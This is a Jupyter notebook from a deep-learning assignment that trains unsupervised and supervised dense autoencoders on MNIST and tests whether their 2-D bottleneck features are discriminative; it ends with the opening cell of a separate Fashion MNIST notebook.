1.2. One-hot encode the labelsIn the input, a label is a scalar in $\{0, 1, \cdots , 9\}$. One-hot encoding transforms such a scalar into a $10$-dim vector. E.g., a scalar ```y_train[j]=3``` is transformed to the vector ```y_train_vec[j]=[0, 0, 0, 1, 0, 0, 0, 0, 0, 0]```.1. Define a function ```to_one_hot``` that transforms an $n\times 1$ array to a $n\times 10$ matrix.2. Apply the function to ```y_train``` and ```y_test```.
###Code
import numpy
def to_one_hot(y, num_class=10):
results = numpy.zeros((len(y), num_class))
for i, label in enumerate(y):
results[i, label] = 1.
return results
y_train_vec = to_one_hot(y_train)
y_test_vec = to_one_hot(y_test)
print('Shape of y_train_vec: ' + str(y_train_vec.shape))
print('Shape of y_test_vec: ' + str(y_test_vec.shape))
print(y_train[0])
print(y_train_vec[0])
###Output
Shape of y_train_vec: (60000, 10)
Shape of y_test_vec: (10000, 10)
5
[0. 0. 0. 0. 0. 1. 0. 0. 0. 0.]
###Markdown
1.3. Randomly partition the training set into training and validation setsRandomly partition the 60K training samples into 2 sets:* a training set containing 10K samples;* a validation set containing 50K samples. (You can use only 10K to save time.)
###Code
rand_indices = numpy.random.permutation(60000)
train_indices = rand_indices[0:10000]
valid_indices = rand_indices[10000:20000]
x_val = x_train[valid_indices, :]
y_val = y_train_vec[valid_indices, :]
x_tr = x_train[train_indices, :]
y_tr = y_train_vec[train_indices, :]
print('Shape of x_tr: ' + str(x_tr.shape))
print('Shape of y_tr: ' + str(y_tr.shape))
print('Shape of x_val: ' + str(x_val.shape))
print('Shape of y_val: ' + str(y_val.shape))
###Output
Shape of x_tr: (10000, 784)
Shape of y_tr: (10000, 10)
Shape of x_val: (10000, 784)
Shape of y_val: (10000, 10)
###Markdown
2. Build an unsupervised autoencoder and tune its hyper-parameters1. Build a dense autoencoder model2. Use the validation data to tune the hyper-parameters (e.g., network structure, and optimization algorithm) * Do NOT use test data for hyper-parameter tuning!!! 3. Try to achieve a validation loss as low as possible.4. Evaluate the model on the test set.5. Visualize the low-dim features and reconstructions. 2.1. Build the model
###Code
from keras.layers import Dense, Input
from keras import models
input_img = Input(shape=(784,), name='input_img')
encode1 = Dense(128, activation='relu', name='encode1')(input_img)
encode2 = Dense(32, activation='relu', name='encode2')(encode1)
encode3 = Dense(8, activation='relu', name='encode3')(encode2)
bottleneck = Dense(2, activation='relu', name='bottleneck')(encode3)
decode1 = Dense(8, activation='relu', name='decode1')(bottleneck)
decode2 = Dense(32, activation='relu', name='decode2')(decode1)
decode3 = Dense(128, activation='relu', name='decode3')(decode2)
decode4 = Dense(784, activation='relu', name='decode4')(decode3)
ae = models.Model(input_img, decode4)
ae.summary()
# print the network structure to a PDF file
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot, plot_model
SVG(model_to_dot(ae, show_shapes=False).create(prog='dot', format='svg'))
plot_model(
model=ae, show_shapes=False,
to_file='unsupervised_ae.pdf'
)
# you can find the file "unsupervised_ae.pdf" in the current directory.
###Output
_____no_output_____
###Markdown
2.2. Train the model and tune the hyper-parameters
###Code
from keras import optimizers
learning_rate = 1E-3 # to be tuned!
ae.compile(loss='mean_squared_error',
optimizer=optimizers.RMSprop(lr=learning_rate))
history = ae.fit(x_tr, x_tr,
batch_size=128,
epochs=100,
validation_data=(x_val, x_val))
import matplotlib.pyplot as plt
%matplotlib inline
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(loss))
plt.plot(epochs, loss, 'bo', label='Training Loss')
plt.plot(epochs, val_loss, 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
2.3. Visualize the reconstructed test images
###Code
ae_output = ae.predict(x_test).reshape((10000, 28, 28))
ROW = 5
COLUMN = 4
x = ae_output
fname = 'reconstruct_ae.pdf'
fig, axes = plt.subplots(nrows=ROW, ncols=COLUMN, figsize=(8, 10))
for ax, i in zip(axes.flat, numpy.arange(ROW*COLUMN)):
image = x[i].reshape(28, 28)
ax.imshow(image, cmap='gray')
ax.axis('off')
plt.tight_layout()
plt.savefig(fname)
plt.show()
###Output
_____no_output_____
###Markdown
2.4. Evaluate the model on the test setDo NOT used the test set until now. Make sure that your model parameters and hyper-parameters are independent of the test set.
###Code
loss = ae.evaluate(x_test, x_test)
print('loss = ' + str(loss))
###Output
313/313 [==============================] - 2s 5ms/step - loss: 0.0435
loss = 0.04351149871945381
###Markdown
2.5. Visualize the low-dimensional features
###Code
# build the encoder network
ae_encoder = models.Model(input_img, bottleneck)
ae_encoder.summary()
# extract low-dimensional features from the test data
encoded_test = ae_encoder.predict(x_test)
print('Shape of encoded_test: ' + str(encoded_test.shape))
colors = numpy.array(['r', 'g', 'b', 'm', 'c', 'k', 'y', 'purple', 'darkred', 'navy'])
colors_test = colors[y_test]
import matplotlib.pyplot as plt
%matplotlib inline
fig = plt.figure(figsize=(8, 8))
plt.scatter(encoded_test[:, 0], encoded_test[:, 1], s=10, c=colors_test, edgecolors=colors_test)
plt.axis('off')
plt.tight_layout()
fname = 'ae_code.pdf'
plt.savefig(fname)
###Output
_____no_output_____
###Markdown
Remark:Judging from the visualization, the low-dim features seem not to be discriminative, as 2D features from different classes are mixed. Let's quantitatively find out whether they are discriminative. 3. Are the learned low-dim features discriminative?To find the answer, let's train a classifier on the training set (the extracted 2-dim features) and evaluate it on the test set.
###Code
# extract the 2D features from the training, validation, and test samples
f_tr = ae_encoder.predict(x_tr)
f_val = ae_encoder.predict(x_val)
f_te = ae_encoder.predict(x_test)
print('Shape of f_tr: ' + str(f_tr.shape))
print('Shape of f_te: ' + str(f_te.shape))
from keras.layers import Dense, Input
from keras import models
input_feat = Input(shape=(2,))
hidden1 = Dense(128, activation='relu')(input_feat)
hidden2 = Dense(128, activation='relu')(hidden1)
output = Dense(10, activation='softmax')(hidden2)
classifier = models.Model(input_feat, output)
classifier.summary()
classifier.compile(loss='categorical_crossentropy',
optimizer=optimizers.RMSprop(lr=1E-4),
metrics=['acc'])
history = classifier.fit(f_tr, y_tr,
batch_size=32,
epochs=100,
validation_data=(f_val, y_val))
###Output
Epoch 1/100
313/313 [==============================] - 3s 8ms/step - loss: 1.9296 - acc: 0.3068 - val_loss: 1.7419 - val_acc: 0.3612
Epoch 2/100
313/313 [==============================] - 2s 7ms/step - loss: 1.6073 - acc: 0.5085 - val_loss: 1.5393 - val_acc: 0.5521
Epoch 3/100
313/313 [==============================] - 2s 7ms/step - loss: 1.4590 - acc: 0.5847 - val_loss: 1.4259 - val_acc: 0.5868
Epoch 4/100
313/313 [==============================] - 2s 7ms/step - loss: 1.3561 - acc: 0.6153 - val_loss: 1.3339 - val_acc: 0.6073
Epoch 5/100
313/313 [==============================] - 2s 7ms/step - loss: 1.2713 - acc: 0.6322 - val_loss: 1.2557 - val_acc: 0.6126
Epoch 6/100
313/313 [==============================] - 2s 7ms/step - loss: 1.2004 - acc: 0.6373 - val_loss: 1.1972 - val_acc: 0.6204
Epoch 7/100
313/313 [==============================] - 2s 7ms/step - loss: 1.1481 - acc: 0.6443 - val_loss: 1.1553 - val_acc: 0.6256
Epoch 8/100
313/313 [==============================] - 2s 8ms/step - loss: 1.1085 - acc: 0.6455 - val_loss: 1.1243 - val_acc: 0.6258
Epoch 9/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0800 - acc: 0.6506 - val_loss: 1.1049 - val_acc: 0.6239
Epoch 10/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0589 - acc: 0.6519 - val_loss: 1.0865 - val_acc: 0.6273
Epoch 11/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0435 - acc: 0.6528 - val_loss: 1.0750 - val_acc: 0.6354
Epoch 12/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0312 - acc: 0.6543 - val_loss: 1.0715 - val_acc: 0.6274
Epoch 13/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0219 - acc: 0.6568 - val_loss: 1.0612 - val_acc: 0.6362
Epoch 14/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0139 - acc: 0.6587 - val_loss: 1.0537 - val_acc: 0.6305
Epoch 15/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0079 - acc: 0.6602 - val_loss: 1.0500 - val_acc: 0.6367
Epoch 16/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0020 - acc: 0.6627 - val_loss: 1.0423 - val_acc: 0.6410
Epoch 17/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9966 - acc: 0.6625 - val_loss: 1.0414 - val_acc: 0.6375
Epoch 18/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9922 - acc: 0.6654 - val_loss: 1.0362 - val_acc: 0.6424
Epoch 19/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9879 - acc: 0.6693 - val_loss: 1.0345 - val_acc: 0.6382
Epoch 20/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9834 - acc: 0.6692 - val_loss: 1.0358 - val_acc: 0.6446
Epoch 21/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9797 - acc: 0.6713 - val_loss: 1.0281 - val_acc: 0.6402
Epoch 22/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9766 - acc: 0.6707 - val_loss: 1.0234 - val_acc: 0.6498
Epoch 23/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9727 - acc: 0.6730 - val_loss: 1.0214 - val_acc: 0.6510
Epoch 24/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9700 - acc: 0.6757 - val_loss: 1.0224 - val_acc: 0.6513
Epoch 25/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9674 - acc: 0.6760 - val_loss: 1.0171 - val_acc: 0.6440
Epoch 26/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9638 - acc: 0.6765 - val_loss: 1.0180 - val_acc: 0.6513
Epoch 27/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9612 - acc: 0.6772 - val_loss: 1.0124 - val_acc: 0.6464
Epoch 28/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9580 - acc: 0.6807 - val_loss: 1.0101 - val_acc: 0.6564
Epoch 29/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9553 - acc: 0.6809 - val_loss: 1.0097 - val_acc: 0.6490
Epoch 30/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9529 - acc: 0.6819 - val_loss: 1.0085 - val_acc: 0.6496
Epoch 31/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9499 - acc: 0.6829 - val_loss: 1.0042 - val_acc: 0.6537
Epoch 32/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9478 - acc: 0.6855 - val_loss: 1.0014 - val_acc: 0.6564
Epoch 33/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9455 - acc: 0.6859 - val_loss: 1.0014 - val_acc: 0.6563
Epoch 34/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9437 - acc: 0.6871 - val_loss: 0.9987 - val_acc: 0.6561
Epoch 35/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9414 - acc: 0.6852 - val_loss: 0.9966 - val_acc: 0.6639
Epoch 36/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9388 - acc: 0.6887 - val_loss: 0.9942 - val_acc: 0.6670
Epoch 37/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9371 - acc: 0.6875 - val_loss: 0.9926 - val_acc: 0.6605
Epoch 38/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9343 - acc: 0.6908 - val_loss: 0.9923 - val_acc: 0.6528
Epoch 39/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9328 - acc: 0.6890 - val_loss: 0.9924 - val_acc: 0.6658
Epoch 40/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9303 - acc: 0.6897 - val_loss: 0.9884 - val_acc: 0.6586
Epoch 41/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9279 - acc: 0.6934 - val_loss: 0.9904 - val_acc: 0.6564
Epoch 42/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9269 - acc: 0.6893 - val_loss: 0.9847 - val_acc: 0.6628
Epoch 43/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9245 - acc: 0.6935 - val_loss: 0.9845 - val_acc: 0.6584
Epoch 44/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9227 - acc: 0.6939 - val_loss: 0.9835 - val_acc: 0.6620
Epoch 45/100
313/313 [==============================] - 2s 6ms/step - loss: 0.9209 - acc: 0.6938 - val_loss: 0.9830 - val_acc: 0.6648
Epoch 46/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9184 - acc: 0.6935 - val_loss: 0.9797 - val_acc: 0.6630
Epoch 47/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9174 - acc: 0.6936 - val_loss: 0.9787 - val_acc: 0.6630
Epoch 48/100
313/313 [==============================] - 3s 8ms/step - loss: 0.9147 - acc: 0.6940 - val_loss: 0.9823 - val_acc: 0.6630
Epoch 49/100
313/313 [==============================] - 2s 8ms/step - loss: 0.9129 - acc: 0.6941 - val_loss: 0.9763 - val_acc: 0.6623
Epoch 50/100
313/313 [==============================] - 2s 5ms/step - loss: 0.9117 - acc: 0.6937 - val_loss: 0.9769 - val_acc: 0.6638
Epoch 51/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9094 - acc: 0.6965 - val_loss: 0.9760 - val_acc: 0.6581
Epoch 52/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9076 - acc: 0.6970 - val_loss: 0.9722 - val_acc: 0.6589
Epoch 53/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9065 - acc: 0.6968 - val_loss: 0.9717 - val_acc: 0.6641
Epoch 54/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9045 - acc: 0.6960 - val_loss: 0.9681 - val_acc: 0.6681
Epoch 55/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9023 - acc: 0.7005 - val_loss: 0.9682 - val_acc: 0.6685
Epoch 56/100
313/313 [==============================] - 2s 8ms/step - loss: 0.8998 - acc: 0.6988 - val_loss: 0.9776 - val_acc: 0.6672
Epoch 57/100
313/313 [==============================] - 3s 10ms/step - loss: 0.8990 - acc: 0.7010 - val_loss: 0.9664 - val_acc: 0.6706
Epoch 58/100
313/313 [==============================] - 2s 5ms/step - loss: 0.8975 - acc: 0.7009 - val_loss: 0.9642 - val_acc: 0.6729
Epoch 59/100
313/313 [==============================] - 1s 4ms/step - loss: 0.8955 - acc: 0.6990 - val_loss: 0.9621 - val_acc: 0.6689
Epoch 60/100
313/313 [==============================] - 1s 3ms/step - loss: 0.8937 - acc: 0.7013 - val_loss: 0.9638 - val_acc: 0.6658
Epoch 61/100
313/313 [==============================] - 1s 4ms/step - loss: 0.8921 - acc: 0.7000 - val_loss: 0.9671 - val_acc: 0.6642
Epoch 62/100
###Markdown
ConclusionUsing the 2D features, the validation accuracy is 60~70%. Recall that using the original data, the accuracy is about 98%. Obviously, the 2D features are not very discriminative.We are going to build a supervised autoencoder model for learning low-dimensional discriminative features. 4. Build a supervised autoencoder model**You are required to build and train a supervised autoencoder that looks like the following.** (Not necessarily the same.) You are required to add other layers properly to alleviate overfitting. 4.1. Build the network
###Code
# build the supervised autoencoder network
from keras.layers import Dense, Input
from keras import models, regularizers
input_img = Input(shape=(784,), name='input_img')
# encoder network
encode1 = Dense(128, activation='relu', name='encode1')(input_img)
encode2 = Dense(32, activation='relu', name='encode2')(encode1)
encode3 = Dense(8, activation='relu', name='encode3')(encode2)
# The width of the bottleneck layer must be exactly 2.
bottleneck = Dense(2, activation='relu', name='bottleneck')(encode3)
# decoder network
decode1 = Dense(8, activation='relu', name='decode1')(bottleneck)
decode2 = Dense(32, activation='relu', name='decode2')(decode1)
decode3 = Dense(128, activation='relu', name='decode3')(decode2)
decode4 = Dense(784, activation='relu', name='decode4')(decode3)
# build a classifier upon the bottleneck layer
classifier1 = Dense(512, activation='relu', name='classifier1')(bottleneck)
classifier2 = Dense(32, activation='relu', name='classifier2', kernel_regularizer=regularizers.l2(0.01))(classifier1)
classifier3 = Dense(10, activation='softmax', name='classifier3')(classifier2)
# connect the input and the two outputs
sae = models.Model(input_img, [decode4, classifier3])
sae.summary()
# print the network structure to a PDF file
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot, plot_model
SVG(model_to_dot(sae, show_shapes=False).create(prog='dot', format='svg'))
plot_model(
model=sae, show_shapes=False,
to_file='supervised_ae.pdf'
)
# you can find the file "supervised_ae.pdf" in the current directory.
###Output
_____no_output_____
###Markdown
4.2. Train the new model and tune the hyper-parametersThe new model has multiple outputs. Thus we specify **multiple** loss functions and their weights.
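Concretely, with the weights used below, the total training loss is $L = 1.0\cdot\mathrm{MSE}(x,\hat{x}) + 0.5\cdot\mathrm{CE}(y,\hat{y})$, so the reconstruction error and the classification error are optimized jointly.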
###Code
from keras import optimizers
sae.compile(loss=['mean_squared_error', 'categorical_crossentropy'],
loss_weights=[1, 0.5], # to be tuned
optimizer=optimizers.RMSprop(lr=1E-3))
history = sae.fit(x_tr, [x_tr, y_tr],
batch_size=32,
epochs=100,
validation_data=(x_val, [x_val, y_val]))
import matplotlib.pyplot as plt
%matplotlib inline
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(loss))
plt.plot(epochs, loss, 'bo', label='Training Loss')
plt.plot(epochs, val_loss, 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
QuestionDo you think overfitting is happening? If yes, what can you do? Please make the necessary changes to the supervised autoencoder network structure (one possible sketch is shown below).**Failing to add proper regularization will lose 1~2 scores.** 4.3. Visualize the reconstructed test images
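As one possible answer to the question above (a minimal sketch, not the official solution; it assumes Keras `Dropout` layers and L2 `kernel_regularizer`s on top of the `bottleneck` tensor from section 4.1, and the rates shown are illustrative), the classifier head could be regularized like this before re-training:
```python
from keras.layers import Dense, Dropout
from keras import regularizers

# Illustrative regularized classifier head on top of the same bottleneck layer
clf = Dense(512, activation='relu', kernel_regularizer=regularizers.l2(1e-3))(bottleneck)
clf = Dropout(0.5)(clf)   # randomly drop half the units during training
clf = Dense(32, activation='relu', kernel_regularizer=regularizers.l2(1e-3))(clf)
clf = Dropout(0.3)(clf)
clf_out = Dense(10, activation='softmax')(clf)
```
Early stopping on the validation loss (e.g. `keras.callbacks.EarlyStopping`) is another common option.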
###Code
sae_output = sae.predict(x_test)[0].reshape((10000, 28, 28))
ROW = 5
COLUMN = 4
x = sae_output
fname = 'reconstruct_sae.pdf'
fig, axes = plt.subplots(nrows=ROW, ncols=COLUMN, figsize=(8, 10))
for ax, i in zip(axes.flat, numpy.arange(ROW*COLUMN)):
image = x[i].reshape(28, 28)
ax.imshow(image, cmap='gray')
ax.axis('off')
plt.tight_layout()
plt.savefig(fname)
plt.show()
###Output
_____no_output_____
###Markdown
4.4. Visualize the low-dimensional features
###Code
# build the encoder model
sae_encoder = models.Model(input_img, bottleneck)
sae_encoder.summary()
# extract test features
encoded_test = sae_encoder.predict(x_test)
print('Shape of encoded_test: ' + str(encoded_test.shape))
colors = numpy.array(['r', 'g', 'b', 'm', 'c', 'k', 'y', 'purple', 'darkred', 'navy'])
colors_test = colors[y_test]
import matplotlib.pyplot as plt
%matplotlib inline
fig = plt.figure(figsize=(8, 8))
plt.scatter(encoded_test[:, 0], encoded_test[:, 1], s=10, c=colors_test, edgecolors=colors_test)
plt.axis('off')
plt.tight_layout()
fname = 'sae_code.pdf'
plt.savefig(fname)
###Output
Shape of encoded_test: (10000, 2)
###Markdown
4.5. Are the learned low-dim features discriminative?To find the answer, let's train a classifier on the training set (the extracted 2-dim features) and evaluate it on the validation and test sets.
###Code
# extract 2D features from the training, validation, and test samples
f_tr = sae_encoder.predict(x_tr)
f_val = sae_encoder.predict(x_val)
f_te = sae_encoder.predict(x_test)
# build a classifier which takes the 2D features as input
from keras.layers import Dense, Input
from keras import models
input_feat = Input(shape=(2,))
classifier_1 = Dense(32, activation='relu', name='classifier_1')(input_feat)
output = Dense(10, activation='softmax', name='output')(classifier_1)
classifier = models.Model(input_feat, output)
classifier.summary()
classifier.compile(loss='categorical_crossentropy',
optimizer=optimizers.RMSprop(lr=1E-4),
metrics=['acc'])
history = classifier.fit(f_tr, y_tr,
batch_size=32,
epochs=100,
validation_data=(f_val, y_val))
###Output
Epoch 1/100
1/313 [..............................] - ETA: 0s - loss: 6.2960 - acc: 0.0000e+00WARNING:tensorflow:Callbacks method `on_train_batch_end` is slow compared to the batch time (batch time: 0.0000s vs `on_train_batch_end` time: 0.0080s). Check your callbacks.
313/313 [==============================] - 3s 9ms/step - loss: 4.9324 - acc: 0.0546 - val_loss: 2.8143 - val_acc: 0.2450
Epoch 2/100
313/313 [==============================] - 2s 6ms/step - loss: 1.8533 - acc: 0.4355 - val_loss: 1.5142 - val_acc: 0.5391
Epoch 3/100
313/313 [==============================] - 2s 6ms/step - loss: 1.2795 - acc: 0.6780 - val_loss: 1.2720 - val_acc: 0.6539
Epoch 4/100
313/313 [==============================] - 2s 6ms/step - loss: 1.0848 - acc: 0.7154 - val_loss: 1.1569 - val_acc: 0.6491
Epoch 5/100
313/313 [==============================] - 2s 6ms/step - loss: 0.9699 - acc: 0.7357 - val_loss: 1.0771 - val_acc: 0.6965
Epoch 6/100
313/313 [==============================] - 2s 6ms/step - loss: 0.8823 - acc: 0.8011 - val_loss: 1.0158 - val_acc: 0.7719
Epoch 7/100
313/313 [==============================] - 2s 6ms/step - loss: 0.8086 - acc: 0.8672 - val_loss: 0.9620 - val_acc: 0.8268
Epoch 8/100
313/313 [==============================] - 2s 6ms/step - loss: 0.7424 - acc: 0.9232 - val_loss: 0.9141 - val_acc: 0.8751
Epoch 9/100
313/313 [==============================] - 2s 6ms/step - loss: 0.6831 - acc: 0.9656 - val_loss: 0.8738 - val_acc: 0.8982
Epoch 10/100
313/313 [==============================] - 2s 6ms/step - loss: 0.6293 - acc: 0.9766 - val_loss: 0.8386 - val_acc: 0.9041
Epoch 11/100
313/313 [==============================] - 2s 6ms/step - loss: 0.5794 - acc: 0.9797 - val_loss: 0.8034 - val_acc: 0.9075
Epoch 12/100
313/313 [==============================] - 2s 6ms/step - loss: 0.5324 - acc: 0.9828 - val_loss: 0.7735 - val_acc: 0.9088
Epoch 13/100
313/313 [==============================] - 2s 8ms/step - loss: 0.4879 - acc: 0.9836 - val_loss: 0.7455 - val_acc: 0.9090
Epoch 14/100
313/313 [==============================] - 2s 5ms/step - loss: 0.4459 - acc: 0.9844 - val_loss: 0.7191 - val_acc: 0.9102
Epoch 15/100
313/313 [==============================] - 2s 6ms/step - loss: 0.4062 - acc: 0.9838 - val_loss: 0.6961 - val_acc: 0.9095
Epoch 16/100
313/313 [==============================] - 2s 7ms/step - loss: 0.3696 - acc: 0.9843 - val_loss: 0.6740 - val_acc: 0.9094
Epoch 17/100
313/313 [==============================] - 2s 7ms/step - loss: 0.3343 - acc: 0.9842 - val_loss: 0.6547 - val_acc: 0.9091
Epoch 18/100
313/313 [==============================] - 1s 4ms/step - loss: 0.3016 - acc: 0.9848 - val_loss: 0.6377 - val_acc: 0.9092
Epoch 19/100
313/313 [==============================] - 1s 4ms/step - loss: 0.2721 - acc: 0.9853 - val_loss: 0.6252 - val_acc: 0.9097
Epoch 20/100
313/313 [==============================] - 1s 4ms/step - loss: 0.2458 - acc: 0.9850 - val_loss: 0.6161 - val_acc: 0.9092
Epoch 21/100
313/313 [==============================] - 1s 4ms/step - loss: 0.2226 - acc: 0.9849 - val_loss: 0.6089 - val_acc: 0.9105
Epoch 22/100
313/313 [==============================] - 1s 3ms/step - loss: 0.2020 - acc: 0.9850 - val_loss: 0.6055 - val_acc: 0.9108
Epoch 23/100
313/313 [==============================] - 1s 3ms/step - loss: 0.1832 - acc: 0.9854 - val_loss: 0.6028 - val_acc: 0.9113
Epoch 24/100
313/313 [==============================] - 3s 9ms/step - loss: 0.1666 - acc: 0.9862 - val_loss: 0.6024 - val_acc: 0.9122
Epoch 25/100
313/313 [==============================] - 2s 5ms/step - loss: 0.1517 - acc: 0.9875 - val_loss: 0.6049 - val_acc: 0.9128
Epoch 26/100
313/313 [==============================] - 1s 4ms/step - loss: 0.1385 - acc: 0.9881 - val_loss: 0.6089 - val_acc: 0.9133
Epoch 27/100
313/313 [==============================] - 1s 3ms/step - loss: 0.1270 - acc: 0.9888 - val_loss: 0.6136 - val_acc: 0.9133
Epoch 28/100
313/313 [==============================] - 1s 4ms/step - loss: 0.1167 - acc: 0.9893 - val_loss: 0.6197 - val_acc: 0.9146
Epoch 29/100
313/313 [==============================] - 2s 6ms/step - loss: 0.1077 - acc: 0.9892 - val_loss: 0.6258 - val_acc: 0.9153
Epoch 30/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0997 - acc: 0.9899 - val_loss: 0.6329 - val_acc: 0.9156
Epoch 31/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0929 - acc: 0.9902 - val_loss: 0.6401 - val_acc: 0.9166
Epoch 32/100
313/313 [==============================] - 3s 8ms/step - loss: 0.0864 - acc: 0.9913 - val_loss: 0.6486 - val_acc: 0.9169
Epoch 33/100
313/313 [==============================] - 2s 5ms/step - loss: 0.0809 - acc: 0.9919 - val_loss: 0.6566 - val_acc: 0.9172
Epoch 34/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0757 - acc: 0.9922 - val_loss: 0.6668 - val_acc: 0.9172
Epoch 35/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0710 - acc: 0.9926 - val_loss: 0.6758 - val_acc: 0.9178
Epoch 36/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0670 - acc: 0.9925 - val_loss: 0.6857 - val_acc: 0.9179
Epoch 37/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0637 - acc: 0.9930 - val_loss: 0.6949 - val_acc: 0.9187
Epoch 38/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0601 - acc: 0.9925 - val_loss: 0.7059 - val_acc: 0.9181
Epoch 39/100
313/313 [==============================] - 2s 8ms/step - loss: 0.0571 - acc: 0.9930 - val_loss: 0.7145 - val_acc: 0.9192
Epoch 40/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0542 - acc: 0.9936 - val_loss: 0.7255 - val_acc: 0.9188
Epoch 41/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0518 - acc: 0.9936 - val_loss: 0.7360 - val_acc: 0.9186
Epoch 42/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0497 - acc: 0.9936 - val_loss: 0.7452 - val_acc: 0.9192
Epoch 43/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0475 - acc: 0.9938 - val_loss: 0.7540 - val_acc: 0.9199
Epoch 44/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0457 - acc: 0.9937 - val_loss: 0.7636 - val_acc: 0.9192
Epoch 45/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0442 - acc: 0.9937 - val_loss: 0.7750 - val_acc: 0.9197
Epoch 46/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0427 - acc: 0.9940 - val_loss: 0.7840 - val_acc: 0.9198
Epoch 47/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0409 - acc: 0.9941 - val_loss: 0.7935 - val_acc: 0.9206
Epoch 48/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0398 - acc: 0.9942 - val_loss: 0.8033 - val_acc: 0.9203
Epoch 49/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0385 - acc: 0.9942 - val_loss: 0.8118 - val_acc: 0.9209
Epoch 50/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0376 - acc: 0.9944 - val_loss: 0.8218 - val_acc: 0.9202
Epoch 51/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0364 - acc: 0.9940 - val_loss: 0.8298 - val_acc: 0.9213
Epoch 52/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0357 - acc: 0.9944 - val_loss: 0.8394 - val_acc: 0.9210
Epoch 53/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0346 - acc: 0.9945 - val_loss: 0.8473 - val_acc: 0.9211
Epoch 54/100
313/313 [==============================] - 2s 8ms/step - loss: 0.0340 - acc: 0.9947 - val_loss: 0.8574 - val_acc: 0.9217
Epoch 55/100
313/313 [==============================] - 2s 5ms/step - loss: 0.0331 - acc: 0.9947 - val_loss: 0.8662 - val_acc: 0.9218
Epoch 56/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0322 - acc: 0.9955 - val_loss: 0.8756 - val_acc: 0.9213
Epoch 57/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0319 - acc: 0.9948 - val_loss: 0.8822 - val_acc: 0.9219
Epoch 58/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0311 - acc: 0.9949 - val_loss: 0.8909 - val_acc: 0.9222
Epoch 59/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0304 - acc: 0.9952 - val_loss: 0.9022 - val_acc: 0.9215
Epoch 60/100
###Markdown
Remark:The validation accuracy must be above 90%. It means the low-dim features learned by the supervised autoencoder are very effective.
###Code
# evaluate your model on the never-seen-before test data
# write your code here:
loss = classifier.evaluate(f_te, y_test_vec)
print('Accuracy:', loss[1])
###Output
313/313 [==============================] - 1s 4ms/step - loss: 1.1095 - acc: 0.9324
Accuracy: 0.9323999881744385
|
jovian/fashion-feedforward-minimal/notebook_source__.ipynb | ###Markdown
Classifying images from Fashion MNIST using feedforward neural networksDataset source: https://github.com/zalandoresearch/fashion-mnistDetailed tutorial: https://jovian.ml/aakashns/04-feedforward-nn
###Code
# Uncomment and run the commands below if imports fail
# !conda install numpy pandas pytorch torchvision cpuonly -c pytorch -y
